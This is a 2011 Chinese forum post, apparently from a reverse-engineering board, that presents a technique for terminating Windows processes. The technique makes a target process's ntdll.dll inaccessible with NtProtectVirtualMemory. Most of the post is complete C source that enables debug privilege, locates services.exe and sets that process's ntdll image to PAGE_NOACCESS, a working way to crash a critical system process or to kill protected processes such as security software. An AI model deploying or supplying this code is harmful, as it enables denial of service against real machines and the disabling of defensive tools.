标 题 : 【原创】利用NtProtectVirtualMemory结束进程 作 者 : KiDebug 时 间 : 2011 - 07 - 13, 09 : 37 : 08 链 接 : http ://bbs.pediy.com/showthread.php?t=137067 原理很简单,用PROCESS_VM_OPERATION打开目标进程(没必要PROCESS_ALL_ACCESS),把目标进程的ntdll.dll设为不能访问
/* * 【作者:KiDebug】 * 【空间:http://hi.baidu.com/KiDebug/】 * VC 6.0编译出错请百度:“vc 6.0 unicode” */ #include <stdio.h> #include <Windows.h> #include <Psapi.h> #include <Tlhelp32.h> #pragma comment(lib,"Psapi.lib") typedef NTSTATUS(__stdcall *RtlAdjustPrivilege_)( ULONG Privilege, BOOLEAN Enable, BOOLEAN CurrentThread, PBOOLEAN Enabled ); RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL; typedef NTSTATUS(__stdcall *NtProtectVirtualMemory_)( __in HANDLE ProcessHandle, __inout PVOID *BaseAddress, __inout PSIZE_T RegionSize, __in ULONG NewProtectWin32, __out PULONG OldProtect ); NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL; ULONG GetPID(WCHAR* proc) { BOOL working = 0; PROCESSENTRY32 lppe = { 0 }; ULONG targetPid = 0; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot) { lppe.dwSize = sizeof(lppe); working = Process32First(hSnapshot, &lppe); while (working) { if (_wcsicmp(lppe.szExeFile, proc) == 0) { targetPid = lppe.th32ProcessID; break; } working = Process32Next(hSnapshot, &lppe); } } CloseHandle(hSnapshot); return targetPid; } void main() { HMODULE ntdll; MODULEINFO ModuleInfo; ntdll = GetModuleHandle(L"ntdll.dll"); if (!GetModuleInformation((HANDLE)-1, ntdll, &ModuleInfo, sizeof(MODULEINFO))) { return; } BOOLEAN Enabled; RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress(ntdll, "RtlAdjustPrivilege"); if (RtlAdjustPrivilege == NULL) { return; } RtlAdjustPrivilege(20, TRUE, FALSE, &Enabled); HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION, FALSE, GetPID(L"services.exe")); if (hProc == NULL) { return; } NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress(ntdll, "NtProtectVirtualMemory"); if (NtProtectVirtualMemory == NULL) { return; } ULONG OldProtect; NtProtectVirtualMemory(hProc, &ModuleInfo.lpBaseOfDll, &ModuleInfo.SizeOfImage, PAGE_NOACCESS, &OldProtect); }